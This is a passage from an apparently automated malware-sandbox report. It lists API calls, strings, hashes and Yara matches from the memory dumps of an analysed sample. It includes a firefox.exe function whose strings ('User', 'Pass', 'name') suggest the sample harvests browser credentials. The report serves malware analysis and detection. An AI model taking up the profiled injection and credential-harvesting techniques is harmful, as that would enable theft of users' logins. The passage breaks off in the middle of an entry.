Sleep.KERNEL32(000007D0), ref: 027E7378

Strings

wininet.dll, xrefs: 027E732E, 027E7337
net.dll, xrefs: 027E7341, 027E739F, 027E73AB

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 09fc52c80f50ea7975b66eae82a5a26b6eda08bb6e7db01688c52576d231686a
Instruction ID: 3cdf0a9d47d19b0d7a8a270baf81d392f59643e0403d0d55aca10ee6a137e41d
Opcode Fuzzy Hash: 09fc52c80f50ea7975b66eae82a5a26b6eda08bb6e7db01688c52576d231686a
Instruction Fuzzy Hash: 7731C1B1641641ABDB55EF68C8A0F6BF7B9EF4C704F048129FA1A9B241D370A445CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 027E88C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,027D3B93), ref: 027E88ED

Strings

.z`, xrefs: 027E88DC, 027E88E8

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: 4c975e9a5397513a39670be37c70b40921ebf42e787d25a63d0c5d988d9a1fff
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: 6BE04FB1200204ABDB14DF59CC48EA777ADEF88750F014558FE0957341D630F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 027E1750, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,00000000,027D3AC6,00000000), ref: 027E1767

Strings

@J7<, xrefs: 027E177B

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: fb64d0bb6f6c1ed7f26cfbe26f9efbf198efd0d5cd5333c5e8293bf2d212c49f
Instruction ID: 6f497a2f43df26c01eda75f0ece2e9f9d339087ba8272e627dc2d287da2b21bf
Opcode Fuzzy Hash: fb64d0bb6f6c1ed7f26cfbe26f9efbf198efd0d5cd5333c5e8293bf2d212c49f
Instruction Fuzzy Hash: D9312FB6A0020A9FDF00DFD8C8819EFB7B9BF88314B108559E516EB214D775EE05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 027E174B, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000,00000000,027D3AC6,00000000), ref: 027E1767

Strings

@J7<, xrefs: 027E177B

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: Initialize
String ID: @J7<
API String ID: 2538663250-2016760708
Opcode ID: 1749d7639a9c45026ab3383218d93fee6d7c2c209b5d40ead05f15305dfad014
Instruction ID: 38f9c06e0fe0655da179bf64db5634a2a47af3ce170d5800ba967ed1c51da58e
Opcode Fuzzy Hash: 1749d7639a9c45026ab3383218d93fee6d7c2c209b5d40ead05f15305dfad014
Instruction Fuzzy Hash: ED311075A0020A9FDF00DFD8C8819EEB7B9BF8C314B108559E916EB214D775AE05CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 027D7280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 027D72DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 027D72FB

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: f32bf8c8cc17aa55ff63a8c828fcd4bad4aaef131df3bbbe3852e5b148fb7fb9
Instruction ID: 012cca20618824088d0b5850a11d9d55652d92780a66126635ed728cf8b23399
Opcode Fuzzy Hash: f32bf8c8cc17aa55ff63a8c828fcd4bad4aaef131df3bbbe3852e5b148fb7fb9
Instruction Fuzzy Hash: 6F01A231A8022977EB22A6948C06FBFB77C5B04F50F150158FF04BA1C1EAA47A064BF5

Uniqueness

Uniqueness Score: -1.00%

Function 027D7303, Relevance: 3.1, APIs: 2, Instructions: 52threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 027D72DA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 027D72FB

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: fbbb2abe1bbe244c7157c29529fb77454f98fe00117805101029615e4868d2d0
Instruction ID: 0eb74db84e0d062f55c2076523a9c4433b7d1b939357af0379a890541b2f1842
Opcode Fuzzy Hash: fbbb2abe1bbe244c7157c29529fb77454f98fe00117805101029615e4868d2d0
Instruction Fuzzy Hash: CFF02832A8022836EB1669905C02FFFF7385B44F21F154198FF04BE5C2E69479064AF4

Uniqueness

Uniqueness Score: -1.00%

Function 027D9B23, Relevance: 1.6, APIs: 1, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 027D9BA2

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 17d12d1b6c6dcf55f9dd3c462a27df5c9dc3ffd65b2353c50e93d5b338a73c3a
Instruction ID: 187b01227bee0504025f9903c54577835fee0d3df1e5521b657fc1699588dd83
Opcode Fuzzy Hash: 17d12d1b6c6dcf55f9dd3c462a27df5c9dc3ffd65b2353c50e93d5b338a73c3a
Instruction Fuzzy Hash: 16210676E0414AEBDF10DF54D885FFDBB76DF45208F05019AEA499B142F632AA08CB60

Uniqueness

Uniqueness Score: -1.00%

Function 027E88F8, Relevance: 1.6, APIs: 1, Instructions: 54processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 027E8984

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 2494d71390fbed997f23a0b53a1ac73983caf1af758f56cb513e063118d32327
Instruction ID: ff8dac7770194c939c88e4da65fff52492c269d132b35a73d43ce76d2c4f38dc
Opcode Fuzzy Hash: 2494d71390fbed997f23a0b53a1ac73983caf1af758f56cb513e063118d32327
Instruction Fuzzy Hash: 3F1129B6208148AFCB10DFA8DCC0DDB77AEAF8C314B15864DFA5D97202D630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 027D9B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 027D9BA2

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction ID: c28bd65951a70d6e6b602cea40a51776ea4e8c86ec3e550f4117f7c40b4cb6d8
Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
Instruction Fuzzy Hash: DA0112B5D0020DE7DF10DBE4DC46F9DB779AB44308F004195AA0997141F671EB14CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 027E892D, Relevance: 1.5, APIs: 1, Instructions: 44processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 027E8984

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 8cc0646a6e06bb57000ccabfafca6c78cb46d4d75f29e04fa63bdacd2562addd
Instruction ID: 28365bfe9d397d6ce2f55b81cddcb98c623f865eb2bbc77678f14a0894c1290a
Opcode Fuzzy Hash: 8cc0646a6e06bb57000ccabfafca6c78cb46d4d75f29e04fa63bdacd2562addd
Instruction Fuzzy Hash: 6A01AFB2210108BBCB58DF89DC85EEB37AEAF8C754F158258FA4D97241D630E851CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 027E8930, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 027E8984

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 8b64de55260d1612ccff96b968142e3e2ca865798ae7955ef39db4a1b1bc0d69
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 2801B2B2210108BFCB54DF89DC84EEB77AEAF8C754F158258FA0D97240D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 027E73F3, Relevance: 1.5, APIs: 1, Instructions: 39threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,027DCCE0,?,?), ref: 027E743C

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86943cf9499a8a54e33e2b2fc83510d9ae79b5a16516b37c10264052db87b082
Instruction ID: a66d2f6296d7d786adf89509c2e822ec03d98339c6095c2b62f1f0344a8c47ed
Opcode Fuzzy Hash: 86943cf9499a8a54e33e2b2fc83510d9ae79b5a16516b37c10264052db87b082
Instruction Fuzzy Hash: 86F0E57778074036E7322AAC9C02FA7BADC8F4AF14F550065F74ABB2C1D5D5B9014AB9

Uniqueness

Uniqueness Score: -1.00%

Function 027E7400, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,-00000002,?,00000000,00000000,?,?,027DCCE0,?,?), ref: 027E743C

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 75d4d488c77de8c65a20700b9ea5a2ed2156aca8c6fb32cdc55bafbf12d4142a
Instruction ID: 77c2fcc43f48bc880b5562cfce390641d236f533d4b0c5ec06940a3912a99a0e
Opcode Fuzzy Hash: 75d4d488c77de8c65a20700b9ea5a2ed2156aca8c6fb32cdc55bafbf12d4142a
Instruction Fuzzy Hash: B5E092333803143AE73165A9AC02FA7B39CCB85B24F140466FB0EEB2C0D595F80146B5

Uniqueness

Uniqueness Score: -1.00%

Function 027E8A11, Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,027DCFB2,027DCFB2,?,00000000,?,?), ref: 027E8A50

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: d0e04c8a9c9eed30e268df8dbc6b1c6c732d1eefccca29db9e5d972dc10a02f5
Instruction ID: 2918dd392bfdcc72f73253a0c9c266d9d21eefe0c3af0d49ee572e0ffd58ad55
Opcode Fuzzy Hash: d0e04c8a9c9eed30e268df8dbc6b1c6c732d1eefccca29db9e5d972dc10a02f5
Instruction Fuzzy Hash: 04E030B1600314ABDB24DF54CC85EDB37A9AF48250F018159FE0DAB341D631E8158BA4

Uniqueness

Uniqueness Score: -1.00%

Function 027E8A20, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,027DCFB2,027DCFB2,?,00000000,?,?), ref: 027E8A50

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: e6e10732950a748b4ac65d0f75970c25afb2186945de3674538d0dd4e0672559
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: 07E01AB1200208ABDB20DF49CC84EE737ADAF88650F018154BA0957241D930E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 027E8880, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(027E3526,?,027E3C9F,027E3C9F,?,027E3526,?,?,?,?,?,00000000,00000000,?), ref: 027E88AD

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: b4a84e0836cb211d1da57644d1941f7c8d48b531f5933f62d32103ea949e75c3
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: 49E012B2200208ABDB24EF99CC44EA777ADAF88650F118558BA095B241CA30F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 027DD420, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008003,?,?,027D7C83,?), ref: 027DD44B

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
Instruction ID: 320338620cb9cf47e208d698ce2b59a97a239448baeae9d4e22db5f9c9ddacd1
Opcode Fuzzy Hash: 5941c0a5fdae3851d709d72054521dfe57e6e64fcf16e108bb6ccc3ba138142f
Instruction Fuzzy Hash: 6CD05E727503042AEA10BAA49C06F2672895B48A04F4940A4F949972C3DA54F4004561

Uniqueness

Uniqueness Score: -1.00%

Function 049D2B2A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 049D2B44

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 65c96a416cabb36d329246cb8197602a763a44f953e73417ff6274d9f1255362
Instruction ID: 3d1639d971b733fa2b60d288dfe3186b06ac5f53b6692ea30b0c33cb5ec2a2f5
Opcode Fuzzy Hash: 65c96a416cabb36d329246cb8197602a763a44f953e73417ff6274d9f1255362
Instruction Fuzzy Hash: 30B09B719015C5C9FB11EBA047087177D546BD1745F25C476D1560741E477CD091F175

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 027E5674, Relevance: 1.3, Strings: 1, Instructions: 12COMMON

Download Yara Rule

Strings

hYJk, xrefs: 027E5674

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: hYJk
API String ID: 0-1816988304
Opcode ID: 719370bc78ae80b4c6f66e221551a6209059a4a0924fe83c55286a1a11cfc941
Instruction ID: 44fdf8a47fea03d9b3c93a230b5236b8cb531cfa883c851c6affea687ea77ae3
Opcode Fuzzy Hash: 719370bc78ae80b4c6f66e221551a6209059a4a0924fe83c55286a1a11cfc941
Instruction Fuzzy Hash: 95B01237F0A1040642240C1979800B0F379E7D313EE0433FFCD087B8000512C454C28F

Uniqueness

Uniqueness Score: -1.00%

Function 027D6AB8, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3a73440091b8e694ab786d58823442d9314e0215cf69fb15da372f841d72ab
Instruction ID: 1c17e2af5f6bc9aaba0cd5a51d363e46529c0ee31b975c2de5473bfd49682c5e
Opcode Fuzzy Hash: 6b3a73440091b8e694ab786d58823442d9314e0215cf69fb15da372f841d72ab
Instruction Fuzzy Hash: EFC0482BA6601846E520686CB8902B0F3EE83AA535F2426A7F819F76509886E4A20598

Uniqueness

Uniqueness Score: -1.00%

Function 027E62B9, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.37528295705.00000000027D0000.00000040.00020000.sdmp, Offset: 027D0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7aa7025de12b25efb151d48b4ebe0f36d52c0ba59d0607383815ff7c502188a
Instruction ID: f0423038d01803a94fcb6270f7b61826f558250efcf8a24fb1d667dfa37597c8
Opcode Fuzzy Hash: c7aa7025de12b25efb151d48b4ebe0f36d52c0ba59d0607383815ff7c502188a
Instruction Fuzzy Hash: EBB01203F040490040114C4B34400B4F770C687033D4433E3CD9CFB0001403C055418C

Uniqueness

Uniqueness Score: -1.00%

Function 049C7550, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON

Download Yara Rule

Strings

Execute=1, xrefs: 04A0451E
CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04A04460
CLIENT(ntdll): Processing section info %ws..., xrefs: 04A04592
CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04A0454D
CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04A04507
CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04A04530
ExecuteOptions, xrefs: 04A044AB

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
API String ID: 0-484625025
Opcode ID: 548e3c3feef92cdba4db292dcdaa2cb9665834fd4cb5fc62d311e8e1bc0e91b7
Instruction ID: cfc663238346c40eddc54bfaf2ed8dd40503e545ce3620197195f612373992f7
Opcode Fuzzy Hash: 548e3c3feef92cdba4db292dcdaa2cb9665834fd4cb5fc62d311e8e1bc0e91b7
Instruction Fuzzy Hash: 1651E831A0025A6BEF10AFE4ED85FAD73A8EF48344F0404FDE905A7181E670BE418F62

Uniqueness

Uniqueness Score: -1.00%

Function 04999046, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON

Download Yara Rule

Strings

$, xrefs: 049990B1
@, xrefs: 04999095

Memory Dump Source

Source File: 0000000D.00000002.37534793009.0000000004960000.00000040.00000001.sdmp, Offset: 04960000, based on PE: true

Associated: 0000000D.00000002.37536453350.0000000004A89000.00000040.00000001.sdmp Download File
Associated: 0000000D.00000002.37536543338.0000000004A8D000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: $$@
API String ID: 0-1194432280
Opcode ID: 24904dcfc1d10cc05a97ee5abbadb7615b9595a1d7411f0ae41b5f30d4758f70
Instruction ID: e405b55a5fa9bb87aa46b5abc6f48f76a6b836cd5756a7b7761c2da2717222ef
Opcode Fuzzy Hash: 24904dcfc1d10cc05a97ee5abbadb7615b9595a1d7411f0ae41b5f30d4758f70
Instruction Fuzzy Hash: E1813EB1D002699BDB35DF54CC44BEEB6B8AB48714F0041EAEA19B7240E7706E85CFA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: firefox.exe PID: 3076 Parent PID: 2092 firefox.exeCOMMON

Executed Functions

Function 000001E92741A4B2, Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 288COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionNamesW.KERNEL32 ref: 000001E92741A6B3

Strings

2, xrefs: 000001E92741A5B1
User, xrefs: 000001E92741A57B
word, xrefs: 000001E92741A56E
Pass, xrefs: 000001E92741A567
UR, xrefs: 000001E92741A52F
name, xrefs: 000001E92741A582
L: , xrefs: 000001E92741A536

Memory Dump Source

Source File: 00000015.00000002.35250053026.000001E927380000.00000040.00020000.sdmp, Offset: 000001E927380000, based on PE: false

Similarity

API ID: NamesPrivateProfileSection
String ID: UR$2$L: $Pass$User$name$word
API String ID: 709140578-2058692283
Opcode ID: 2634d713e03c4249ea3ef125dc13a9036903a6f93b935f15d9626ba978a7b125
Instruction ID: 89798a53728f0c3abef229f2c265867ac5dfb565e3315c9be0a51f7b4238c8ff
Opcode Fuzzy Hash: 2634d713e03c4249ea3ef125dc13a9036903a6f93b935f15d9626ba978a7b125
Instruction Fuzzy Hash: 74A19270A1C7489FEB28EF68D4447EEB7E2FB58300F00462EE94AD7292DF7095558789

Uniqueness

Uniqueness Score: -1.00%

Function 000001E92741ED02, Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL ref: 000001E92741EF19

Strings

`, xrefs: 000001E92741EEED

Memory Dump Source

Source File: 00000015.00000002.35250053026.000001E927380000.00000040.00020000.sdmp, Offset: 000001E927380000, based on PE: false

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: d77668096b18891c3cee839e8581402439719b55f2a783575009bfdf60917714
Instruction ID: 7c2216d8802dbda814b76f6df308dd62f523808fc71618d20b9d0d50190692e3
Opcode Fuzzy Hash: d77668096b18891c3cee839e8581402439719b55f2a783575009bfdf60917714
Instruction Fuzzy Hash: CD225F74A1CA4A9FDB99EF28C4857EDF7E1FB58301F40422AE55EE3290DB30A451CB85

Uniqueness

Uniqueness Score: -1.00%

Function 000001E927420762, Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.35250053026.000001E927380000.00000040.00020000.sdmp, Offset: 000001E927380000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1e992e853f5319a5e44a433e2df559e407adb8b6d37870ff715de64f33b6fb3
Instruction ID: aa43152ab4ed6e543f05463665c362f3ffc15d64d47eed25a88e525f6f856f76
Opcode Fuzzy Hash: d1e992e853f5319a5e44a433e2df559e407adb8b6d37870ff715de64f33b6fb3
Instruction Fuzzy Hash: A1415530A146C66AFFA4B738C4857EE62D3FF95300F9404299E0AE63E7DF64E8518752

Uniqueness

Uniqueness Score: -1.00%

Function 000001E92741D4E2, Relevance: 1.6, APIs: 1, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL ref: 000001E92741D55B

Memory Dump Source

Source File: 00000015.00000002.35250053026.000001E927380000.00000040.00020000.sdmp, Offset: 000001E927380000, based on PE: false

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: e15ec73648a025ceb5b3a15fe8fd4bd4c46c9f3de2ee994074a413c48c56ecde
Instruction ID: 762282a167a662236054c3b21bb0ff9acb38de1fadcd6440c5895211fc3fd734
Opcode Fuzzy Hash: e15ec73648a025ceb5b3a15fe8fd4bd4c46c9f3de2ee994074a413c48c56ecde
Instruction Fuzzy Hash: F301D830608A495BEB54EB25D8D97FF73D2FBD8308F4005296D4ED6291EB34D6508B41

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: certmgr3ff.exe PID: 1444 Parent PID: 680 certmgr3ff.exeCOMMON

Executed Functions

Function 0241A25C, Relevance: 16.7, APIs: 2, Strings: 7, Instructions: 941COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
w2%h, xrefs: 024161EC
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 1029625771-2385936248
Opcode ID: 63315520c0dcf31af8cbedf9c549b6944a058895431bc129b28afde1b558e0ff
Instruction ID: 41b57d6cee41f8354d12c2b968f52a587301af9fbbe1af83afffb87b8116dc28
Opcode Fuzzy Hash: 63315520c0dcf31af8cbedf9c549b6944a058895431bc129b28afde1b558e0ff
Instruction Fuzzy Hash: 1492FCB2604399DFDB749F39CD557EA7BB2BF98310F42812ADC899B614D3309A81CB41

Uniqueness

Uniqueness Score: -1.00%

Function 024158A9, Relevance: 14.7, APIs: 1, Strings: 7, Instructions: 717COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
w2%h, xrefs: 024161EC
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: 8154a7fa034d4a4f1d74c0d3b934cd309a29435ae7913f7a6d9b0c3ba62195cd
Instruction ID: 28f9c424894d7049657a7bc49f29592bbf07bc82b887537ef7e1920ac7f438cf
Opcode Fuzzy Hash: 8154a7fa034d4a4f1d74c0d3b934cd309a29435ae7913f7a6d9b0c3ba62195cd
Instruction Fuzzy Hash: C962ECB26043899FDB748F39CD457DA7BA2FF59310F45822ADC899B664D3309A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02415EFD, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 622COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
w2%h, xrefs: 024161EC
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: ccf08b296c991997286519c6724c31e393d15f1ded1e3030248a2d733a5d2aaa
Instruction ID: d19565322fd143dd7ae6d0bf8820ad9ed589534fba8f74f3d097471180287f92
Opcode Fuzzy Hash: ccf08b296c991997286519c6724c31e393d15f1ded1e3030248a2d733a5d2aaa
Instruction Fuzzy Hash: 7A52CAB26043899FDB749F39CD457DA7BB2FF99310F46812ADC499B624D3309A82CB41

Uniqueness

Uniqueness Score: -1.00%

Function 02415EC3, Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 618COMMON

Download Yara Rule

Strings

$M, xrefs: 02416E9E
d-, xrefs: 02416C1F
w2%h, xrefs: 024161EC
`1, xrefs: 0241633D
KV, xrefs: 02416577
k/\, xrefs: 024162E6
i&Hh, xrefs: 024163EF

Memory Dump Source

Source File: 00000017.00000002.35412996172.0000000002410000.00000040.00000001.sdmp, Offset: 02410000, based on PE: false

Yara matches

Similarity

API ID:
String ID: i&Hh$k/\$w2%h$$M$KV$`1$d-
API String ID: 0-2385936248
Opcode ID: b3e7a64d2e2280b7d49c8b7f69e67f1be8ab205b489057398aafd6c8851bd922
